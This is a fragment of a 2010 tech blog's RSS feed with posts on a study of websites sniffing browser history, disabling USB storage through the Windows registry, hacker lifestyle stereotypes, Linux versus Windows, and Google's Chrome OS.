+0000</pubDate><atom:updated>2010-12-16T12:00:49.825+05:30</atom:updated><title>Popular sites caught sniffing user browser history</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQmx6Dun-PI/AAAAAAAAAJQ/xahmGgRVCv8/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/_u_FPbAGnpWc/TQmx6Dun-PI/AAAAAAAAAJQ/xahmGgRVCv8/s1600/images.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Boffins from Southern California have caught YouPorn.com and 45 other  sites stealing visitors&#39; surfing habits in what is believed to be the  first study to measure in-the-wild exploits of a decade-old browser  liability. YouPorn, which fancies itself the YouTube of smut, uses  JavaScript to detect whether visitors have recently browsed to  PornHub.com, tube8.com and 21 other sites, according to the study. It  tracked the 50,000 most popular websites and found a total of 46 other  offenders, as well as news sites license.net and newsmax.com, finance  site morningstar.com and sports site espnf1.com.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
“We found that several popular sites – including an Alexa global top-100  site – make use of history sniffing to exfiltrate information about  users&#39; browsing history, and, in some cases, do so in an obfuscated  manner to avoid easy detection,” the report states. “While researchers  have known about the possibility of such attacks, hitherto it was not  known how prevalent they are in real, popular websites.” &lt;br /&gt;
&lt;br /&gt;
To cover its tracks, You Porn encodes its JavaScript to hide the sites  it searches for and decodes it only when used. Other websites  dynamically generate the snoop code to stop detection by simple  inspection. Still others rely on third-party history-stealing libraries  from services that include interclick.com and meaningtool.com. The  scientists detected the history stealing by concocting their own version of Google&#39;s Chrome browser with a JavaScript information flow engine that &lt;br /&gt;
“uses a active source-to-source rewriting approach.”&lt;br /&gt;
&lt;br /&gt;
The 46 sites exploit a widely known vulnerability that currently exists  in all production version browsers except of Apple&#39;s Safari, which  earlier this year became the first major browser to insulate users  against the threat. Google Chrome, which is based on the same Webkit  engine, soon followed. Beta versions of Mozilla Firefox and Microsoft  Internet Explorer also fix the problem, but production versions of those  browsers are still wide open. The exploit works by using JavaScript to  read cascading style sheet technologies included in virtually every  browser that causes visited links to appear in purple rather than blue.  Developers have known of the weakness for a decade or more but until  recently said it couldn&#39;t be easily repaired without removing core  functionality.&lt;br /&gt;
&lt;br /&gt;
The study also detected code on sites maintained by Microsoft, YouTube,  Yahoo and About.com that perform what the scientists called “behavioral  sniffing.” They employ JavaScript that covertly tracks mouse movements  on a page to detect what a user does after visiting it.&lt;/span&gt;</description><link>http://hackinverse.blogspot.com/2010/12/popular-sites-caught-sniffing-user.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_u_FPbAGnpWc/TQmx6Dun-PI/AAAAAAAAAJQ/xahmGgRVCv8/s72-c/images.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-8573636387663735673</guid><pubDate>Wed, 15 Dec 2010 20:45:00 +0000</pubDate><atom:updated>2010-12-16T02:16:54.195+05:30</atom:updated><title>How to disable or enable USB port or device</title><description>USB Devices are portable enough to carry the data from one computer  to another , It is always risky to enable USB ports of computers in  large organizations , data center and cyber cafes since it can be the  gateway for virus and malwares. You can &lt;b&gt;disable or enable USB port or device&lt;/b&gt; in three ways&lt;br /&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/_u_FPbAGnpWc/TMb_Tp73ajI/AAAAAAAAAGk/Hxx_2Yo5llg/s1600/images+(6).jpg&quot; onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/_u_FPbAGnpWc/TMb_Tp73ajI/AAAAAAAAAGk/Hxx_2Yo5llg/s1600/images+(6).jpg&quot; style=&quot;float: left; height: 136px; margin-bottom: 10px; margin-left: 0px; margin-right: 10px; margin-top: 0px; width: 369px;&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Enable / Disable USB port and device in BIOS&lt;/b&gt;&lt;br /&gt;
It can be enabled or disabled in BIOS where the peripheral device  setting is configured. While booting the system you will be getting an  option to configure BIOS settings. But only problem is you will not be  able to use those USB ports for any purpose like connecting USB  keyboards or mouse or any devices.&lt;br /&gt;
&lt;b&gt;Enable / Disable USB port and device using registry hack in windows&lt;/b&gt;&lt;br /&gt;
Another effective way to enable or disable USB port or device is to  hack registry entry in windows , it will allow you to use your USB port  for other functions like connecting keyboard or mouse but you can  restrict the data storage through USB port&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
A. Click on Start –&amp;gt; Run –&amp;gt; regedit [enter]&lt;br /&gt;
B. Search for the key “&lt;b&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor&lt;/b&gt;”&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;C. Select the key &lt;b&gt;UsbStor&lt;/b&gt;, double clicks on &lt;b&gt;Start&lt;/b&gt; value.D. In “&lt;b&gt;Value data&lt;/b&gt;” enter 4 to disable USB storage, or enter 3 to enable USB storage on windows system&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Freeware to enable or disable USB port or device in Windows 7 and XP&lt;/b&gt;&lt;br /&gt;
There is a nice tool to enable or disable USB PORT in registry. It  exactly does the above mentioned steps. If you are not an experienced  users then I would prefer you to use below mentioned software for this  task. Please remember that it is always risky to edit windows registry.</description><link>http://hackinverse.blogspot.com/2010/12/how-to-disable-or-enable-usb-port-or.html</link><author>noreply@blogger.com (Hackinverse)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_u_FPbAGnpWc/TMb_Tp73ajI/AAAAAAAAAGk/Hxx_2Yo5llg/s72-c/images+(6).jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-3195710102177660606</guid><pubDate>Tue, 14 Dec 2010 05:50:00 +0000</pubDate><atom:updated>2010-12-14T18:00:51.176+05:30</atom:updated><title>“h4x0r 1n m3″ – Developing a Hacker’s Behaviour</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;To obtain the status of a Hacker, &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;You Have To Want It&lt;/b&gt;&lt;/span&gt;, and &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;You Have To Earn It&lt;/b&gt;&lt;/span&gt;.  It is not something that can really be taught, it is only something you  can learn for yourself, although I can attempt to help guide you.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Although hackers are substantially different people with unique  personalities, they mysteriously all seem to lead similar lifestyles.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCOpNr8AVUaS748n9OLDmuYPQ4MUmjBc53Jguux3SnA3yhUehI51-xj-jiueA74xUzM18EPUYGKWW_vznPviFFPMNKERqLkTIAuMEblcvGA2hMdd2EJMaYJJvYsbQvaHp_hqO8tsphj30/s1600/hacker-cartoon-series-thumb11785452.jpg&quot; imageanchor=&quot;1&quot; linkindex=&quot;0&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;281&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCOpNr8AVUaS748n9OLDmuYPQ4MUmjBc53Jguux3SnA3yhUehI51-xj-jiueA74xUzM18EPUYGKWW_vznPviFFPMNKERqLkTIAuMEblcvGA2hMdd2EJMaYJJvYsbQvaHp_hqO8tsphj30/s320/hacker-cartoon-series-thumb11785452.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;b&gt;&amp;nbsp;Dressing Style:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;  Clothes can range from your typical nerdy suit with pocket protectors  and suspenders as if their mom still dresses them, to a  gothic/techno-rave homemade looking getup. Considering the fact that  hackers exist all over the world, you can’t really place their style of  clothing into a particular group; the most famous however is hoodies and  shades, kind of like a gangster as it makes one appear very incognito  (even though the paleness from lack of sunlight gives them away).&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;/div&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;b&gt;Living Style:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;  A typical hacker will drive a cargo van, live in their home’s basement  (or alone), listen to video game music rather than regular music (even  though more and more popular music has been making its way into video  games), and will likely have their room decorated with something very  cultural or sci-fi, whether it be japanese manga/anime, action-figures,  or the like.&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;b&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;Sports:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;  Geeks don’t like sports whether a result of a traumatic childhood  memory or just because of the physical activity involved. Even sport  themed video games rarely get any attention from this crowd. Fantasy and  first-person-shooter games are much more appealing.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;b&gt;Fooding Habits:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;  Flat foods seem to be quite popular, such as cheese, hot pockets, pop  tarts, toast, and pizza, anything microwavable. There are quite a few  theories as to why this is so, and the majority seems to agree it is  because geeks are just lazy and want something easy to make. Although I  could have sworn I heard somewhere that it goes way back to a specific  tyrant in the early days of the computer business who shall remain  nameless, who overworked his programmers, and some joke/rumor spread  around that he slipped food to them underneath of the doors. Both  explanations are perfectly feasible. Caffeinated beverages are also a  must, as insomnia and countless hours of coding need fuel. A famous  saying is &lt;span style=&quot;color: blue;&quot;&gt;&lt;b&gt;“Sleep is for the Weak.”&lt;/b&gt;&lt;/span&gt; &lt;img alt=&quot;:)&quot; class=&quot;wp-smiley&quot; src=&quot;http://kyrionhackingtutorials.com/blog/wp-includes/images/smilies/icon_smile.gif&quot; /&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: black;&quot;&gt;Talking Style:&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;A  hacker rarely speaks unless they have to, and they type as little as  possible by abbreviating or using acronyms. It reserves strength, and is  good for multi-tasking. The geek mind thinks out of the box,  automation, the less work the better. It is always better to use E-mail  or txt messaging over your voice, even if it’s to communicate with  someone sitting right next to you. Electronic messaging is the next best  thing to telepathy (even though I hear they have some people playing  video games with microchips in their brains now, craziness). A hacker  may also very well be bilingual; they are extremely cultural people, but  just because someone is a geek doesn’t mean they know every other geek  in the world, so don’t ask.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;b&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;Public Appearance:&lt;/span&gt;&lt;/b&gt; &lt;/span&gt;Hackers  more or less either fade in or stand out, but mostly fade in. Hackers  do tend to avoid drawing any unnecessary attention to themselves. It is  perfectly okay for hackers to mock themselves, amongst themselves, but  for anyone else to do it could be considered offensive. I wasn’t exactly  flattered by the fact that one time when the electricity went out, when  all the lights come back on everybody was looking at me… okay yes I  was.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: black;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;b&gt;&lt;span style=&quot;text-decoration: underline;&quot;&gt;Book Worms:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;  Hackers like to hang out at bookstores in the coding section, and at  radio shack. Some experts say that anyone with a rudimentary knowledge  of electronics can obtain the sufficient materials needed from radio  shack to assemble an extremely complex bomb. Not that a hacker likes to  build bombs or anything, but it’s an excellent place to experiment with  and learn about electronics.&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/h4x0r-1n-m3-developing-hackers.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCOpNr8AVUaS748n9OLDmuYPQ4MUmjBc53Jguux3SnA3yhUehI51-xj-jiueA74xUzM18EPUYGKWW_vznPviFFPMNKERqLkTIAuMEblcvGA2hMdd2EJMaYJJvYsbQvaHp_hqO8tsphj30/s72-c/hacker-cartoon-series-thumb11785452.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-7601700819123306000</guid><pubDate>Tue, 14 Dec 2010 05:43:00 +0000</pubDate><atom:updated>2010-12-14T18:04:19.975+05:30</atom:updated><title>Linux isn’t exactly the same as Windows.</title><description>&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;You’d be amazed how many people make this complaint. They come to Linux, expecting to find essentially&amp;nbsp;&lt;span style=&quot;margin: 0px; padding: 0px;&quot;&gt;a free, open-source version of Windows.&lt;/span&gt;&amp;nbsp;Quite often, this is what they’ve been told to expect by over-zealous Linux users. However, it’s a paradoxi&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px;&quot;&gt;cal hope.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; font-size: 13px; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; font-size: 13px; line-height: 19px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: normal;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px; margin: 0px 0px 0.8em; padding: 0px; text-align: justify;&quot;&gt;The specific reasons why people try Linux vary wildly, but the overall reason boils down to one thing: They hope Linux will be better than Windows. Common yardsticks for measuring success are cost, choice, performance, and security. There are many others. But every Windows user who tries Linux, does so because they hope it will be better than what they’ve got.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZikyZiRPbKfCeNYvWAfrgb8hKMPfQI-Sqhtal082YDhD3Fbc1BqOD9a43zQjL9S1_ThByn2D7G5Er4Kah1Sz3AJlH7CCc6IFD12OOXSjQUIMg6Rc3S70fnyIdxCLJDRdjBrt7yMK7zmA/s1600/windows-vs-linux.jpg&quot; imageanchor=&quot;1&quot; linkindex=&quot;17&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZikyZiRPbKfCeNYvWAfrgb8hKMPfQI-Sqhtal082YDhD3Fbc1BqOD9a43zQjL9S1_ThByn2D7G5Er4Kah1Sz3AJlH7CCc6IFD12OOXSjQUIMg6Rc3S70fnyIdxCLJDRdjBrt7yMK7zmA/s1600/windows-vs-linux.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px; margin: 0px 0px 0.8em; padding: 0px; text-align: justify;&quot;&gt;Therein lies the problem.&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px; margin: 0px 0px 0.8em; padding: 0px; text-align: justify;&quot;&gt;It is logically impossible for any thing to be better than any other thing whilst remaining completely identical to it. A perfect copy may be equal, but it can never surpass. So when you gave Linux a try in hopes that it would be better, you were inescapably hoping that it would be different. Too many people ignore this fact, and hold up every difference between the two OSes as a Linux failure.&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px; margin: 0px 0px 0.8em; padding: 0px; text-align: justify;&quot;&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;As a simple example, consider driver upgrades: one typically upgrades a hardware driver on Windows by going to the manufacturer’s website and downloading the new driver; whereas in Linux you upgrade the kernel.&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px; margin: 0px 0px 0.8em; padding: 0px; text-align: justify;&quot;&gt;This means that a single Linux download &amp;amp; upgrade will give you the newest drivers available for your machine, whereas in Windows you would have to surf to multiple sites and download all the upgrades individually. It’s a very different process, but it’s certainly not a bad one. But many people complain because it’s not what they’re used to.&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px; margin: 0px 0px 0.8em; padding: 0px; text-align: justify;&quot;&gt;Or, as an example you’re more likely to relate to, consider Firefox: One of the biggest open-source success stories. A web browser that took the world by storm. Did it achieve this success by being a perfect imitation of IE, the then-most-popular browser?&lt;/div&gt;&lt;div style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; line-height: 19px; margin: 0px 0px 0.8em; padding: 0px; text-align: justify;&quot;&gt;No. It was successful because it was&amp;nbsp;&lt;i style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; margin: 0px; padding: 0px;&quot;&gt;better&lt;/i&gt;&amp;nbsp;than IE, and it was&amp;nbsp;&lt;i style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; margin: 0px; padding: 0px;&quot;&gt;better&lt;/i&gt;&amp;nbsp;because it was&lt;i style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; margin: 0px; padding: 0px;&quot;&gt;different&lt;/i&gt;. It had tabbed browsing, live bookmarks, built-in searchbar, PNG support, adblock extensions, and other wonderful things. The&amp;nbsp;&lt;i style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; margin: 0px; padding: 0px;&quot;&gt;“Find”&lt;/i&gt;&amp;nbsp;functionality appeared in a toolbar at the bottom and looked for matches as you typed, turning red when you had no match. IE had no tabs, no RSS functionality, searchbars only via third-party extensions, and a find dialogue that required a click on&amp;nbsp;&lt;i style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; margin: 0px; padding: 0px;&quot;&gt;“OK”&lt;/i&gt;&amp;nbsp;to start looking and a click on&amp;nbsp;&lt;i style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; margin: 0px; padding: 0px;&quot;&gt;“OK”&lt;/i&gt;&amp;nbsp;to clear the&amp;nbsp;&lt;i style=&quot;font-family: Georgia,&#39;Nimbus Roman No9 L&#39;,serif; margin: 0px; padding: 0px;&quot;&gt;“Not found”&amp;nbsp;&lt;/i&gt;error message. A clear and inarguable demonstration of an open-source application achieving success by being better, and being better by being different. Had FF been an&amp;nbsp;IE clone, it would have vanished into obscurity. And had Linux been a Windows clone, the same would have happened.&lt;/div&gt;</description><link>http://hackinverse.blogspot.com/2010/12/linux-isnt-exactly-same-as-windows.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZikyZiRPbKfCeNYvWAfrgb8hKMPfQI-Sqhtal082YDhD3Fbc1BqOD9a43zQjL9S1_ThByn2D7G5Er4Kah1Sz3AJlH7CCc6IFD12OOXSjQUIMg6Rc3S70fnyIdxCLJDRdjBrt7yMK7zmA/s72-c/windows-vs-linux.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-1641883697144881112</guid><pubDate>Mon, 13 Dec 2010 13:00:00 +0000</pubDate><atom:updated>2010-12-13T23:19:14.710+05:30</atom:updated><title>The Browser Takes All</title><description>This week, Google unveiled a computer like no other: the Cr-48, a  notebook that relies on the Web for all its software applications. Yet  the Web search giant thinks the notebook can compete with computers that  run all kinds of installed software.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijQorYaNnIC0aCFGVg8CDZjugh2FK5ivVingapUQHkhlFnIN817fBnZekVy8avOyOuxW3bjVIRTlbkDuTUQRNtwXNCPckQyOit8pYqwcxnihVQC86OOxncYSs5W5CJUTBOXbIgLMO8PH8/s1600/google-chrome-os1.jpg&quot; imageanchor=&quot;1&quot; linkindex=&quot;19&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;234&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijQorYaNnIC0aCFGVg8CDZjugh2FK5ivVingapUQHkhlFnIN817fBnZekVy8avOyOuxW3bjVIRTlbkDuTUQRNtwXNCPckQyOit8pYqwcxnihVQC86OOxncYSs5W5CJUTBOXbIgLMO8PH8/s320/google-chrome-os1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;The matte black Cr-48 won&#39;t be sold to the public, but thousands are  being sent to consumers and businesses who have volunteered to test it.  It introduces a new kind of operating system, called Chrome OS, that  turns to the Web for almost everything. Google is pitching Chrome OS as  its vision for a new form of computing—one that shifts the data,  functionality and almost everything else you would expect from your  desktop computer into the cloud. Chrome OS will get its biggest test  when Acer and Samsung start selling notebook computers customized to run  the software in mid-2011.&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Google&#39;s Chrome OS vision is perhaps best understood by examining the  differences between Chrome OS and the operating systems commonly used  today, says Sundar Pichai, the vice president of product management for  Chrome OS (and the related Chrome Web browser). Those differences come  from a single design decision about the relationship between a person  and his computer, Pichai says&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&quot;Operating systems today are centered on the idea that applications  can be trusted to modify the system, and that users can be trusted to  install applications that are trustworthy,&quot; he says, &quot;it turns out those  are bad assumptions.&quot;&lt;br /&gt;
&lt;div class=&quot;articleAd&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img alt=&quot;Advertisement&quot; class=&quot; iqkowpfestvcazenufvp iqkowpfestvcazenufvp iqkowpfestvcazenufvp iqkowpfestvcazenufvp iqkowpfestvcazenufvp iqkowpfestvcazenufvp iqkowpfestvcazenufvp iqkowpfestvcazenufvp iqkowpfestvcazenufvp&quot; height=&quot;17&quot; src=&quot;http://www.technologyreview.com/images/ad_legend_h.gif&quot; style=&quot;margin-bottom: 0pt; margin-top: 0pt;&quot; width=&quot;79&quot; /&gt;&lt;br /&gt;
&lt;noscript&gt; &amp;amp;amp;amp;amp;lt;a href=&quot;//ad.doubleclick.net/jump/mk3.technologyreview.com/mediumrectangle4;!category=webexc;channel=web;section=;at=mediumrectangle4;page=home;s=mediumrectangle4;ord=?&quot; target=&quot;_blank&quot;&amp;amp;amp;amp;amp;gt; &amp;amp;amp;amp;amp;lt;img src=&quot;//ad.doubleclick.net/ad/mk3.technologyreview.com/mediumrectangle4;!category=webexc;channel=web;section=;at=mediumrectangle4;page=home;s=mediumrectangle4;ord=?&quot; border=&quot;0&quot; alt=&quot;click here...&quot; /&amp;amp;amp;amp;amp;gt; &amp;amp;amp;amp;amp;lt;/a&amp;amp;amp;amp;amp;gt; &lt;/noscript&gt;    &lt;/div&gt;&lt;/div&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=7928312777523567518&amp;amp;postID=1641883697144881112&quot; linkindex=&quot;20&quot; name=&quot;afteradbody&quot;&gt;&lt;/a&gt;   In contrast, Chrome OS assumes that applications and users can&#39;t be  trusted. And it has just one application: the browser. &quot;There&#39;s a  cascade of things that happen when you make this core assumption,&quot; says  Linus Upson, a Google VP of engineering working on the project, from  making it easier to protect against malware, to reducing the need for  users to act as administrator for their own system. &lt;br /&gt;
Chrome OS—based on a pared-down version of the Linux operating  system—automatically downloads and installs its own updates. Any data  downloaded in the course of using the Web is kept carefully in a secure  place, separate from the OS.&lt;br /&gt;
Google still needs to prove that the simplicity of Chrome OS doesn&#39;t  undo its usefulness. To this end, it has built a Web &quot;app store&quot; to  encourage developers to create Web-based software that will match the  diversity and functionality of the applications that can be installed on  the hard drive of a Windows or Mac computer. These apps are basically  advanced websites that offer similar functionality to desktop apps  software.&lt;br /&gt;
Users of Chrome OS—as well as the Chrome browser on a conventional computer—can search or browse the &lt;a href=&quot;https://chrome.google.com/webstore&quot; linkindex=&quot;21&quot; target=&quot;_blank&quot;&gt;Chrome Web Store&lt;/a&gt;  and with a single click install apps. The store has far fewer software  applications than are available for a conventional machine. But some  Chrome apps can compete with more traditional, desktop applications, for  example a Photoshop-like &lt;a href=&quot;https://chrome.google.com/webstore/detail/dafkakmjmhfnnfclmjdfpnbmdeddkoeo&quot; linkindex=&quot;22&quot; target=&quot;_blank&quot;&gt;image editor, Aviary&lt;/a&gt;.&lt;br /&gt;
Pichai says the fact the app store takes payments—either one off or  subscriptions—should stimulate the creation of apps that otherwise  wouldn&#39;t exist because developers couldn&#39;t make them profitable. &quot;I  wouldn&#39;t find a random game on a website and give them my credit card  details to pay $3.99. It&#39;s not worth the time or the risk.&quot;&lt;br /&gt;
Somewhat surprisingly, given Google&#39;s claimed commitment to the open  Web, Google&#39;s app store is not compatible with other Web browsers. But  it is possible to easily modify apps developed for Chrome&#39;s store for  other &quot;modern&quot; browsers, says Pichai, since they use HTML5 and other web standards  designed to enable advanced functionality, including working while  offline. The latest versions of Internet Explorer, and other browsers,  support those standards. However some features of Chrome apps remain  exclusive to Chrome, such as 3-D effects that tap into a machine&#39;s  graphics processor. &quot;We need to make sure that apps can do everything  that apps can do on the desktop today,&quot; Pichai explains. He expects  other browsers to catch up as HTML5 and other new Web standards become  more common.</description><link>http://hackinverse.blogspot.com/2010/12/browser-takes-all.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijQorYaNnIC0aCFGVg8CDZjugh2FK5ivVingapUQHkhlFnIN817fBnZekVy8avOyOuxW3bjVIRTlbkDuTUQRNtwXNCPckQyOit8pYqwcxnihVQC86OOxncYSs5W5CJUTBOXbIgLMO8PH8/s72-c/google-chrome-os1.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7928312777523567518.post-7859758030552764178</guid><pubDate>Sat, 11 Dec 2010 07:17:00 +0000</pubDate><atom:updated>2010-12-17T11:05:46.225+05:30</atom:updated><title>Google Chrome OS</title><description>&quot;Google&#39;s Chrome OS chiefs explain in Technology Review how most of  the web-only OS&#39;s features flow from changing one core assumption of  previous operating system designs. &#39;Operating systems today are centered  on the idea that applications can be trusted to modify the system, and  that users can be trusted to install applications that are trustworthy,&#39;  says Google VP Sundar Pichai. Chrome doesn&#39;t trust applications,  or users — and neither can modify the system. Once users are banned  from installing applications, or modifying the system security,  usability, and more are improved, the Googlers claim.&quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
